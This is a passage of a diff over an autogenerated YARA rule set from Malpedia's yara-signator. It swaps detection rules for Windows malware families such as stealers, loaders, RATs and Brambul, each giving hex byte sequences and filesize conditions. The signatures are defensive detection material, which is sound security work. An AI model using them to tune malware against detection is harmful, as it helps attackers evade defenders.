+		$sequence_8 = { 89540f24 8bd6 8b048578512501 8945ec 8b4dec 33ff }
+		$sequence_9 = { 844415dc 750a 8bfe 8a07 84c0 75e1 eb05 }
 
 	condition:
-		7 of them and filesize < 13587456
+		7 of them and filesize < 663552
 }
-rule MALPEDIA_Win_Krdownloader_Auto : FILE
+rule MALPEDIA_Win_Oceansalt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10ef2ce3-6275-5734-8773-8e4b907d8dbf"
+		id = "191b2018-8ac3-5133-a29f-db070c527bb4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.krdownloader_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oceansalt_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "5c0e3ed0b3f2de4235868995565358a807a3f9a7ed056ed4108e22469b818ef9"
+		logic_hash = "618191320109f3ef06ff0a1fecf4d89247c2a03c9ed872381bb347fb4c387d8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135701,32 +136218,38 @@ rule MALPEDIA_Win_Krdownloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645e161 c645e22e c645e370 c645e468 c645e570 c645e63f c645e76d }
-		$sequence_1 = { 8b4dbc 894db4 8b55b8 81c200010000 52 }
-		$sequence_2 = { e8???????? 8945f0 8b45f8 8b4df0 3b4808 7708 }
-		$sequence_3 = { 8b55ec 52 68???????? 68???????? e8???????? }
-		$sequence_4 = { 52 e8???????? 83c40c 85c0 752c 837d0c00 741d }
-		$sequence_5 = { 8b4510 50 e8???????? 83c40c eb23 8b4d14 c70150000000 }
-		$sequence_6 = { 50 ff15???????? 6aff ff15???????? 6a3c e8???????? 83c404 }
-		$sequence_7 = { 894dc0 8b55c0 8955ac 8b45fc }
-		$sequence_8 = { 8b4df8 894df4 8b55f4 83c210 }
-		$sequence_9 = { 51 6a00 8b4d10 e8???????? 894590 8b5590 89558c }
+		$sequence_0 = { 6a00 6a02 8d8dc8fdffff 51 }
+		$sequence_1 = { ff15???????? 5d c3 8b5508 68???????? 52 }
+		$sequence_2 = { 0fb795f2fbffff 50 0fb785eefbffff 51 52 50 }
+		$sequence_3 = { 85c0 75ce 8b8dc4fdffff 8d85ccfdffff 50 }
+		$sequence_4 = { 6a04 50 8d55fc 52 }
+		$sequence_5 = { 668945f9 8845fb 6a07 8d45f4 50 56 }
+		$sequence_6 = { 6a04 53 ff15???????? 8bf8 85ff 743c }
+		$sequence_7 = { 6a01 ff15???????? 6aff 50 ff15???????? 6a00 6a02 }
+		$sequence_8 = { eb26 488d442420 488d4c2420 482bd8 660f1f840000000000 0fb601 48ffc1 }
+		$sequence_9 = { 85c0 7e3a 488b0d???????? 4c8d0df1140100 488d942400010000 41b800020000 }
+		$sequence_10 = { f644246010 740a c68424e002000000 eb1a }
+		$sequence_11 = { 0f8c96000000 3b1d???????? 0f838a000000 488bf3 4c8be3 49c1fc05 4c8d2d1a0d0100 }
+		$sequence_12 = { 48c1f805 4c8d0542720000 83e11f 486bc958 498b04c0 80640808fe eb07 }
+		$sequence_13 = { 48ffc3 48ffc0 884bff 84c9 }
+		$sequence_14 = { 488d4c2458 4889442458 ff15???????? 0fb7542454 0fb74c2450 }
+		$sequence_15 = { 7d1a 4863cf 8a84191d010000 42888401202e0100 ffc7 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE
+rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9353009a-9ab6-50d2-b27c-912bbfae24ce"
+		id = "1ccbeb2b-8652-556b-a78e-87a19479b4d7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.godzilla_loader_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stealer_0x3401_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "15db96ce18a2f3fdeaf72974bdf0f4fdfaa545b5ea238cf268df493277052de4"
+		logic_hash = "00bd8b2b3e3b3733d5bcbc0fb6b2848b3225fb02bf487f9ea61c20713054d985"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135740,32 +136263,32 @@ rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45fc 50 57 6a01 56 ff7508 8975fc }
-		$sequence_1 = { 7406 8b08 50 ff511c }
-		$sequence_2 = { 57 6a01 56 ff7508 8975fc ff15???????? }
-		$sequence_3 = { 51 56 57 ff7508 ff15???????? 8bf0 56 }
-		$sequence_4 = { 50 a5 ff512c 85c0 756c }
-		$sequence_5 = { 8d45fc 50 57 6a01 56 ff7508 }
-		$sequence_6 = { 50 57 6a01 56 ff7508 }
-		$sequence_7 = { 6a01 56 ff7508 8975fc ff15???????? }
-		$sequence_8 = { 50 ff91f0000000 85c0 7813 }
-		$sequence_9 = { 50 57 6a01 56 ff7508 8975fc ff15???????? }
+		$sequence_0 = { 33c5 8945fc 53 56 57 33db bf01000000 }
+		$sequence_1 = { 6800400000 8d85f07fffff c745fc00000000 6a00 }
+		$sequence_2 = { 898850030000 8b4508 59 c74048a8640210 8b4508 }
+		$sequence_3 = { 83c40c c785acfdffff04010000 8d85acfdffff 50 8d85e8fdffff 50 }
+		$sequence_4 = { c645fc0b 8d4da8 e8???????? 83c408 6aff c645fc0c }
+		$sequence_5 = { 837c240800 75be ddd8 db2d???????? b802000000 833d????????00 0f8590190000 }
+		$sequence_6 = { 8d4c2434 e8???????? 53 e8???????? 83c404 8d44242c 8bcf }
+		$sequence_7 = { 50 6a00 66c745d90000 c645db00 660fd645e6 66c745ee0000 ffd7 }
+		$sequence_8 = { 50 8d45f4 64a300000000 8d8580fdffff c7857cfdffff00000000 50 ff15???????? }
+		$sequence_9 = { f30f59c1 f30f110424 e8???????? f30f100d???????? 8b559c f20f5ac0 51 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 357376
 }
-rule MALPEDIA_Win_Kelihos_Auto : FILE
+rule MALPEDIA_Win_Jinxloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "916af3c3-ae46-5939-bcc1-467f81305f04"
+		id = "cb454fe4-e9ad-5069-aba0-8fdb369e6db4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kelihos_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jinxloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jinxloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "01c4d51fd72ba50cd8794e1b3e4eee55e82df8fc084f2e85675408a95d821aa3"
+		logic_hash = "c58b02af334fd67d7a0c2822fadcfa6594a39ce2fb1e10101df77761efab8668"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135779,32 +136302,32 @@ rule MALPEDIA_Win_Kelihos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7508 e8???????? 59 c3 6a10 68c8b20310 e8???????? }
-		$sequence_1 = { e8???????? 8ac3 e9???????? b301 e9???????? 56 8db710010000 }
-		$sequence_2 = { c645fc01 8db780000000 6a01 8975f0 e8???????? 59 59 }
-		$sequence_3 = { e8???????? 83c40c ff7510 c645fc01 50 8d45bc 50 }
-		$sequence_4 = { e8???????? c645fc03 53 8d4d9c c7851cffffff3c000000 89b530ffffff e8???????? }
-		$sequence_5 = { c645fc06 e8???????? 59 59 56 53 50 }
-		$sequence_6 = { e8???????? eb48 8d7598 e8???????? ffb564ffffff 8dbd58ffffff 8d75a0 }
-		$sequence_7 = { e8???????? 8bf0 53 8d442428 50 8bce e8???????? }
-		$sequence_8 = { e8???????? 8b4508 6a03 e8???????? ff7618 8b4d08 e8???????? }
-		$sequence_9 = { e8???????? ff770c 8d75ec e8???????? ff75f8 8d45ec ff75f4 }
+		$sequence_0 = { e8???????? e8???????? e8???????? 488b442450 6690 e8???????? 488d0529305400 }
+		$sequence_1 = { 4d09c4 4921d3 4d09cb 4c21d2 4809c2 90 48894c2420 }
+		$sequence_2 = { eb0a 488b4c2470 488b5c2460 488b9424e8000000 48899a80020000 833d????????00 7413 }
+		$sequence_3 = { eb1d 440fb64c3419 4129d1 418d5121 88543c19 418d5021 88543419 }
+		$sequence_4 = { 84c9 740d b802000000 31db 4883c420 5d c3 }
+		$sequence_5 = { eb12 4531e4 31ff 4531ed eb08 4531e4 31ff }
+		$sequence_6 = { e9???????? 4889d9 6690 e8???????? 440f117c2460 440f117c2470 488d1568010000 }
+		$sequence_7 = { e9???????? 90 488dbc24e0000000 488d7fe0 0f1f8000000000 48896c24f0 488d6c24f0 }
+		$sequence_8 = { e8???????? 488b8c24b8000000 49890b 488b9424c0000000 49895308 48894818 48895020 }
+		$sequence_9 = { e8???????? 4883c418 5d c3 4889442428 488d0582005500 6690 }
 
 	condition:
-		7 of them and filesize < 4702208
+		7 of them and filesize < 20364288
 }
-rule MALPEDIA_Win_Eyservice_Auto : FILE
+rule MALPEDIA_Win_Sepsys_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "589ff6f4-47d8-50d3-88a8-cdfa19ccb778"
+		id = "ae60c103-173f-5306-92ac-d702be74a065"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.eyservice_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sepsys_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9d569b1b4aa245beb2c0397a0750c9c20deb66d33a0ec235ace59e3da184607d"
+		logic_hash = "652d59df346d9da22c7542823cefcfc7111985f5ad38199ac4913217f1dfac22"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135818,32 +136341,32 @@ rule MALPEDIA_Win_Eyservice_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6aff 50 ff15???????? 85c0 757e 8b4624 }
-		$sequence_1 = { e8???????? 83beac01000001 750d 8b8eec000000 51 }
-		$sequence_2 = { e8???????? 83c404 8bc8 e8???????? 8bf0 8bce e8???????? }
-		$sequence_3 = { 51 668944244c ffd5 668b542446 8b4c2442 668954241e 8b542446 }
-		$sequence_4 = { 0fbf8a883b4100 0fbf0c4dea3f4100 3bc8 7433 0fbf82c03c4100 3d94000000 7c0a }
-		$sequence_5 = { 7509 b86e000000 5e c20800 8b06 034604 }
-		$sequence_6 = { 894614 ff86c0000000 83bec000000001 57 7513 ff15???????? 56 }
-		$sequence_7 = { ff15???????? 8bc7 5f 8b8c246c020000 5b 5e }
-		$sequence_8 = { 7426 8b4610 2bc7 c1f802 8d0c8500000000 8d2c11 }
-		$sequence_9 = { 8b7704 2bf0 7424 3bf1 7602 8bf1 }
+		$sequence_0 = { c685fb00000000 8a4517 2401 88c1 e8???????? 884516 eb00 }
+		$sequence_1 = { e8???????? eb00 488b4db0 c645f700 488b45c8 488945e0 0f1045b8 }
+		$sequence_2 = { e9???????? 4883bd9801000000 7714 eb09 c685df01000001 eb29 c685df01000000 }
+		$sequence_3 = { e8???????? 488b442428 488b4820 48894c2478 488b4828 48898c2480000000 488b4830 }
+		$sequence_4 = { eb00 eb00 eb00 31c0 89c1 488b55f0 4881ea02000000 }
+		$sequence_5 = { 817c243448270000 7507 c644243001 eb05 c644243000 48837c245800 740b }
+		$sequence_6 = { 83c804 89442420 8b442420 0fbaf008 89442420 e9???????? 8b442420 }
+		$sequence_7 = { e8???????? 488d4518 488b4df8 48894de8 4889c1 488b55e8 4c8b45f0 }
+		$sequence_8 = { ebe9 488b45e0 4883c460 5d c3 f645f601 74f0 }
+		$sequence_9 = { c685b600000000 c685b400000000 e9???????? c685b400000000 488b4d28 488b5530 e8???????? }
 
 	condition:
-		7 of them and filesize < 452608
+		7 of them and filesize < 4538368
 }
-rule MALPEDIA_Win_Advisorsbot_Auto : FILE
+rule MALPEDIA_Win_Brambul_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d26aaef7-489b-5eb4-8cea-1ab552de40d6"
+		id = "ab481228-bdce-550e-a6f6-2d8dfaa70a2b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.advisorsbot_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.brambul_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "b714abe1aa8dcb7f6377853b7e4c0df837d586795e3163f35470e362238d5477"
+		logic_hash = "4ef5f993f2727cb74a42049fbc80622dc3543c88c7bb52088b1f5b1131ebc4b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135857,42 +136380,40 @@ rule MALPEDIA_Win_Advisorsbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc1 2bc2 d1e8 03c2 c1e808 }
-		$sequence_1 = { b89b01a311 f7e1 2bca d1e9 03ca }
-		$sequence_2 = { 8bc2 33d2 c1e808 f7f1 }
-		$sequence_3 = { 8bc2 33d2 c1e809 f7f1 }
-		$sequence_4 = { d1e8 03c2 33d2 c1e809 }
-		$sequence_5 = { b80923ed58 f7e1 8bc1 2bc2 }
-		$sequence_6 = { 8b442408 8b4c2408 33d2 f7f1 }
-		$sequence_7 = { 8bc2 c1e807 33d2 f7f1 }
-		$sequence_8 = { d1e9 03ca c1e909 33c8 }
-		$sequence_9 = { 8bc2 33d2 c1e804 f7f1 }
-		$sequence_10 = { d1e9 03ca c1e907 2bc1 }
-		$sequence_11 = { d1e9 03ca 33d2 c1e908 }
-		$sequence_12 = { 5e 5d 0fb7c2 5b }
-		$sequence_13 = { 668b4c2410 5f 5e 5d 0fb7c1 5b }
-		$sequence_14 = { 0fb6c1 0fb6ca 33d2 f7f1 }
-		$sequence_15 = { 0fb7c0 0fb7c9 33d2 f7f1 }
-		$sequence_16 = { 0fb6c0 0fb6c9 33d2 f7f1 }
-		$sequence_17 = { 668b442410 5f 5e 5d 0fb7c0 5b }
+		$sequence_0 = { 33c9 48 898d4cffffff 7413 33f6 }
+		$sequence_1 = { 8a4c0603 880c06 40 3bc7 7cf4 c6043700 }
+		$sequence_2 = { 5a d3e2 4a 8955e4 83f814 7320 6a1b }
+		$sequence_3 = { 03f5 8d8c31a1ebd96e 8b7044 8be9 c1ed1d }
+		$sequence_4 = { 50 687e660480 56 e8???????? 8b8c241c010000 6a10 }
+		$sequence_5 = { 8bfa 03f2 33fe 33f9 03fb 8bde 8dac2f22619d6d }
+		$sequence_6 = { e9???????? f6c140 0f8572040000 898db849ffff }
+		$sequence_7 = { 8975ec 895508 8975f8 8945f4 }
+		$sequence_8 = { 56 e8???????? 85c0 7e55 68???????? }
+		$sequence_9 = { 0fb600 d3e0 094508 ff45fc 3bf3 72e9 6a01 }
+		$sequence_10 = { 8b4dfc 5f 8908 8b450c }
+		$sequence_11 = { 89742424 0f8e3f010000 83fe0c 0f8636010000 668b5302 8b3d???????? 52 }
+		$sequence_12 = { ffd7 83e00f 83f803 0f8431010000 83f802 7514 668b4302 }
+		$sequence_13 = { 8bf0 81e2ff00ff00 81e6ff00ff00 33d6 33c2 }
+		$sequence_14 = { 8bf3 33ea c1ee0f c1e311 0bf3 8b5824 03f2 }
+		$sequence_15 = { f3a5 6a00 ff15???????? 83c41c 50 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Banjori_Auto : FILE
+rule MALPEDIA_Win_Radrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0fe922ef-f1d7-5df7-a358-1fecc2c2b8e9"
+		id = "94a4381e-af30-56d4-9d5d-0552148c1f7c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.banjori_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.radrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0ea88ecfce727aae78a4405fc075f0c940df492b8f26cbc0ee71a3d10d4f39b8"
+		logic_hash = "67ebe4ff9f98e9eca0e16834a563e516c10727efd1f7a1ab36f600d08a7aa26c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -135904,32 +136425,32 @@ rule MALPEDIA_Win_Banjori_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2b4df4 c1e010 0bc1 8b550c 3902 7506 8b4508 }
-		$sequence_1 = { 66696c653d2768 7474 703a 2f 2f 6a61 626265 }
-		$sequence_2 = { 8bec 83c4d8 57 56 53 33db e8???????? }
-		$sequence_3 = { 81c49cfeffff 57 56 53 33db e8???????? 8945fc }
-		$sequence_4 = { 8b00 85c0 7529 ff75f8 e8???????? 8b7dfc 57 }
-		$sequence_5 = { 83c4d8 57 56 6a0a ff15???????? 391d???????? }
-		$sequence_6 = { ff75f4 ff15???????? ff75f8 e8???????? ff7510 ff750c ff75f4 }
-		$sequence_7 = { 0145f4 6a42 ff75f4 ff75f8 ff15???????? 8945f8 ff75dc }
-		$sequence_8 = { 8b12 80fa30 7504 66c1ea08 663bca 7410 8b45f0 }
-		$sequence_9 = { 57 e8???????? 395dc8 0f843a010000 ff75e4 57 ff15???????? }
+		$sequence_0 = { e8???????? 83bdb4feffff00 7554 8b85b0feffff 50 ff15???????? 8b4d08 }
+		$sequence_1 = { 8d9550fdffff 52 ff15???????? 83c40c 8d8550fdffff 50 8d8d40fdffff }
+		$sequence_2 = { e8???????? 8985e07cffff 8d8d00e6ffff 51 e8???????? 83c42c 8985dc7cffff }
+		$sequence_3 = { 8d8d5cffffff e8???????? c745fc00000000 8b8568fbffff c7805003000000000000 c7805403000000000000 8b8d68fbffff }
+		$sequence_4 = { e8???????? 8b8d44feffff e8???????? 25ff000000 85c0 7414 8b8d44feffff }
+		$sequence_5 = { c1e608 8b559c 33ff 668bba4c020000 03fe 03f8 03f9 }
+		$sequence_6 = { 8d8d58ffffff e8???????? c745fcffffffff 8d4d80 e8???????? 8a85148effff e9???????? }
+		$sequence_7 = { 8d8d10fdffff e8???????? c3 8d8de8fcffff e8???????? c3 8d8dc0fcffff }
+		$sequence_8 = { c645fc01 8d8d58feffff e8???????? c645fc00 8d8d80feffff e8???????? c745fcffffffff }
+		$sequence_9 = { 8d8d18d7ffff e8???????? c645fc02 8d8df0d6ffff e8???????? c645fc01 8d8d58ffffff }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 2080768
 }
-rule MALPEDIA_Win_Crutch_Auto : FILE
+rule MALPEDIA_Win_Stresspaint_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "36959a18-dba5-5b13-9b8a-5318a7ab018e"
+		id = "1c5fe12e-e2db-536e-9708-f093f3acd070"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crutch_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stresspaint_auto.yar#L1-L157"
 		license_url = "N/A"
-		logic_hash = "6e39432bedc9454e05a5557719c4ba13f7f6afdacb986523a0105dea7f4efdfa"
+		logic_hash = "d6c444a9c27d97e7ed3d7b7007c87aa66e22a92b316794a07d87a908d3a44119"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135943,32 +136464,38 @@ rule MALPEDIA_Win_Crutch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3944240c 0f8523060000 837e5800 0f84cb000000 8d442418 50 8d4c2408 }
-		$sequence_1 = { 85c0 0f85bc000000 8b4c2458 6a00 6a00 8d86604b0000 50 }
-		$sequence_2 = { c60730 4f 4e 85d2 7e0f 2bf2 }
-		$sequence_3 = { 8944241c 8944242c 83f901 7507 b9???????? eb0f 83f902 }
-		$sequence_4 = { 07 08cc 8b442404 56 8bb088050000 85f6 7438 }
-		$sequence_5 = { 8b742424 8b9660060000 83ec10 8bcc 8911 8b9664060000 895104 }
-		$sequence_6 = { 899ee8020000 e8???????? 8bf8 5f 33db 5b }
-		$sequence_7 = { 0f85ab000000 837dec00 0f84a1000000 8b55f4 8b049588980710 f644180448 7452 }
-		$sequence_8 = { 8db0f04b0000 8937 e8???????? 8906 c7460400000000 85db 743b }
-		$sequence_9 = { 5d c3 6a6c b8???????? e8???????? 8bf9 83ec18 }
+		$sequence_0 = { 0103 014510 294514 83665800 }
+		$sequence_1 = { 8d54241c 52 6880000000 e8???????? }
+		$sequence_2 = { 0106 83560400 837d1c00 7494 }
+		$sequence_3 = { 0103 ebaa 8b442408 56 }
+		$sequence_4 = { 0107 115f04 3bcb 7508 }
+		$sequence_5 = { 0108 8b8e44010000 114804 8b4f18 }
+		$sequence_6 = { 8d54241c 52 50 56 e8???????? 8b4c243c }
+		$sequence_7 = { 8d54241c 52 51 55 }
+		$sequence_8 = { 8d54241c 52 56 50 e8???????? 83c40c }
+		$sequence_9 = { 0107 83570400 85c9 7508 }
+		$sequence_10 = { 8d54241c 52 50 57 e8???????? 53 }
+		$sequence_11 = { 010b 8945fc 8bc2 83530400 }
+		$sequence_12 = { 8d54241c 52 8d8424e4000000 6800040000 }
+		$sequence_13 = { 0103 014510 294674 8b4674 }
+		$sequence_14 = { 8d54241c 51 8d442430 52 50 55 56 }
+		$sequence_15 = { 8d54241c 52 56 ff5718 56 53 }
 
 	condition:
-		7 of them and filesize < 1067008
+		7 of them and filesize < 1155072
 }
-rule MALPEDIA_Win_Buzus_Auto : FILE
+rule MALPEDIA_Win_Mailto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f2c6c20b-b508-5a77-9b4a-9c4e0b2d073d"
+		id = "e0688f37-3d60-5119-a0ac-dc5f19aa3f15"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.buzus_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mailto_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "8e43adb8c81d9beeeff3e46894b189cae5a523720c80cbd55f0f1970ef5f7600"
+		logic_hash = "4dc12b92c2c7f2a09f935b0b6cb8c34c3ae7e4e45623def262729c72d8213e08"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135982,32 +136509,32 @@ rule MALPEDIA_Win_Buzus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd6 59 3bc3 59 8945ec 741a }
-		$sequence_1 = { 391d???????? 7420 3bcb 741c 391d???????? 7414 391d???????? }
-		$sequence_2 = { 8bec 83ec10 56 8bf1 807e0400 7561 6a06 }
-		$sequence_3 = { 750b 68???????? ff15???????? ff75d4 }
-		$sequence_4 = { 6a10 68???????? 8d85ecd9ffff 56 50 e8???????? 83c410 }
-		$sequence_5 = { 50 8d85f8fdffff 50 ffd6 8bf8 85ff }
-		$sequence_6 = { 8975dc 0fb68503ffffff 0fb6b512ffffff 8955d0 8945bc }
-		$sequence_7 = { 32c3 741c 3c0a 7418 3c0d 7414 3c5c }
-		$sequence_8 = { 1bc0 83e003 e9???????? 6a06 }
-		$sequence_9 = { 83c418 33db 8d85d8faffff 53 53 53 53 }
+		$sequence_0 = { 8bc8 83c408 85c9 7412 a1???????? }
+		$sequence_1 = { 8d8424d4000000 50 8d442440 50 e8???????? 8d442444 50 }
+		$sequence_2 = { c744246072006900 c744246476006900 c74424686c006500 c744246c67006500 6689442470 6a10 }
+		$sequence_3 = { 8b4c241c 660f1f840000000000 8bc3 81e3ffffff03 c1f81a 0344242c }
+		$sequence_4 = { 83f804 57 0f44d9 e8???????? 83c404 85db 747d }
+		$sequence_5 = { 56 8b742428 56 8b4034 ffd0 83c408 85c0 }
+		$sequence_6 = { 2b442410 83c003 50 e8???????? 83c404 89442410 85c0 }
+		$sequence_7 = { 53 55 56 8b742420 33db 85f6 0f84a0000000 }
+		$sequence_8 = { e8???????? 83c40c c7400c00000000 8d4705 5f }
+		$sequence_9 = { 53 8b2cb0 e8???????? 50 53 ff7504 e8???????? }
 
 	condition:
-		7 of them and filesize < 679936
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Gearshift_Auto : FILE
+rule MALPEDIA_Win_Shujin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00cf566b-9374-5def-8d2f-a72e86672548"
+		id = "2a43000e-7971-5f56-a789-53c0781b645d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gearshift_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shujin_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "917aa162d8155114b467928aa78b546e741372aa2ec73d46169e5f3309d74a6b"
+		logic_hash = "9e7c36d5a8e7a7e0db70030a2edbd679a6e8a68faaf57024a99c72983d6e53eb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136021,32 +136548,32 @@ rule MALPEDIA_Win_Gearshift_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41bb00020000 4c8d0d11a2ffff 458a20 4584e4 0f8547f9ffff 44385598 740b }
-		$sequence_1 = { 664189844888b40300 ffc2 ebe2 8bd7 89542420 }
-		$sequence_2 = { 85c0 0f8565010000 488d4c2424 33d2 }
-		$sequence_3 = { 85c0 750d 8b442428 ffc6 4883c304 }
-		$sequence_4 = { 488bcb 48894550 ff15???????? 48894558 48397548 }
-		$sequence_5 = { 498bcc e8???????? 85c0 750d }
-		$sequence_6 = { 41b800100000 4c896008 4c897810 4c897818 418b5550 498bcc }
-		$sequence_7 = { ff96b0000000 85c0 0f8408ffffff 488b4500 48ba00000000ffffffff 488b7830 0fb74814 }
-		$sequence_8 = { c6858000000000 e8???????? 4c8d442438 418bd7 }
-		$sequence_9 = { 488bc8 ff15???????? 4885c0 7449 488d4df7 }
+		$sequence_0 = { 23d8 333c9de8994000 0fb6590b 23d0 333c95e8a14000 8b510a 897906 }
+		$sequence_1 = { 8b5df8 c1eb18 333c9de8954000 8b5dfc 23d8 333c9de8a14000 }
